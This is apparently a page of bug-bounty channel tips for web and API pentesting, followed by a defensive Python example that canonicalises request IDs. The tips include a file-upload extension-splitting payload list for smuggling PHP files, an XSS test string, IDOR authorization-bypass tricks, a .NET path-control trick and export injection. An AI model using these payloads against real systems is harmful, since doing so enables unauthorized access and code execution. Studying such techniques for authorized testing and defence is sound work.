Bug Bounty - GitBook


Andrew Hoffman, Web Application Security: Exploitation and Countermeasures for Modern Web Applications, Second Edition, 2024


37 books


Guys, do you want these books?

File Upload Extension Splitting Cheat Sheet
🔸 qwe.php%00.png
🔸 qwe.php%0A.png
🔸 qwe.php\n.png
🔸 qwe.php\u000a.png
🔸 qwe.php\u560a.png
🔸 qwe.php%E5%98%8A.png
🔸 qwe.php;.png
🔸 qwe.php%3B.png
🔸 qwe.php\u003b.png
🔸 qwe.php\u563b.png
🔸 qwe.php%E5%98%BB.png
#Shell @GitBook_s

xsshunter.com: you can use an alternative 🔗 http://xss.report #XSS @GitBook_s

#BugBounty @GitBook_s

APIs expose the underlying implementation of the app. Pentesters should leverage this fact to better understand users, roles, resources & correlations between them and find cool vulnerabilities & exploits. Always be curious about the API responses. #api @GitBook_s

Pentest for .NET apps? Found a param containing a file path/name? Developers sometimes use "Path.Combine(path_1,path_2)" to create the full path. Path.Combine has weird behavior: if param #2 is an absolute path, then param #1 is ignored. Leverage it to control the path #api @GitBook_s

BE servers are no longer responsible for protecting against XSS. APIs don't return HTML, but JSON instead. What if the API returns an XSS payload? E.g.: {"name":"In<script>alert(21)</script>on"} That's fine! The protection always needs to be on the client side #api @GitBook_s

Looking for BOLA (IDOR) in APIs? Got 401/403 errors? AuthZ bypass tricks:
Wrap ID with an array: {"id":111} --> {"id":[111]}
JSON wrap: {"id":111} --> {"id":{"id":111}}
Send ID twice: URL?id=<LEGIT>&id=<VICTIM>
Send wildcard: {"user_id":"*"}
In some cases, the AuthZ mechanism expects a plain string (an ID in this case), and if it receives a JSON instead it won't perform the AuthZ checks. Then, when the input goes to the data fetching component, it might be okay with a JSON instead of a string (e.g. it flattens the JSON) #api @GitBook_s
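The defensive side of the post above, as an added example that is not part of the original channel post: the handler reduces the ID to one canonical integer before the authorization check and fetches with that same value, so array, nested-object, repeated-parameter and wildcard forms are refused with 400. The record store, user names and function names are constructed for illustration.

```python
import json
from urllib.parse import parse_qs

# Constructed sample store (record id -> owner); all names here are hypothetical.
RECORDS = {111: "alice", 222: "bob"}

class BadRequest(Exception):
    pass

class Forbidden(Exception):
    pass

def canonical_id(raw):
    """Reduce input to one positive int; reject lists, objects, wildcards, bools."""
    if isinstance(raw, str) and raw.isascii() and raw.isdigit() and len(raw) <= 18:
        raw = int(raw)
    if isinstance(raw, int) and not isinstance(raw, bool) and raw > 0:
        return raw
    raise BadRequest("id must be a single positive integer")

def id_from_json(body):
    try:
        doc = json.loads(body)
    except ValueError:
        raise BadRequest("body is not valid JSON")
    if not isinstance(doc, dict) or "id" not in doc:
        raise BadRequest("missing id")
    return canonical_id(doc["id"])

def id_from_query(query_string):
    values = parse_qs(query_string or "", keep_blank_values=True).get("id", [])
    if len(values) != 1:  # a repeated parameter is ambiguous, so refuse it
        raise BadRequest("exactly one id parameter is required")
    return canonical_id(values[0])

def get_record(user, record_id):
    """Authorize and fetch with the same canonical value."""
    owner = RECORDS.get(record_id)
    if owner is None or owner != user:
        raise Forbidden("record not accessible")
    return {"id": record_id, "owner": owner}

def handle(user, body=None, query=None):
    try:
        rid = id_from_json(body) if body is not None else id_from_query(query)
        return 200, get_record(user, rid)
    except BadRequest as exc:
        return 400, str(exc)
    except Forbidden as exc:
        return 403, str(exc)
```

The point of `get_record` taking the already-canonical integer is that the authorization check and the data fetch can never see two different interpretations of the same request.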

Found an "export to PDF" feature? There's a good chance the developers use an external library to convert HTML --> PDF behind the scenes. Try to inject HTML elements and cause "Export Injection". Learn more about Export Injection: https://medium.com/@inonst/export-injection-2eebc4f17117 #api @GitBook_s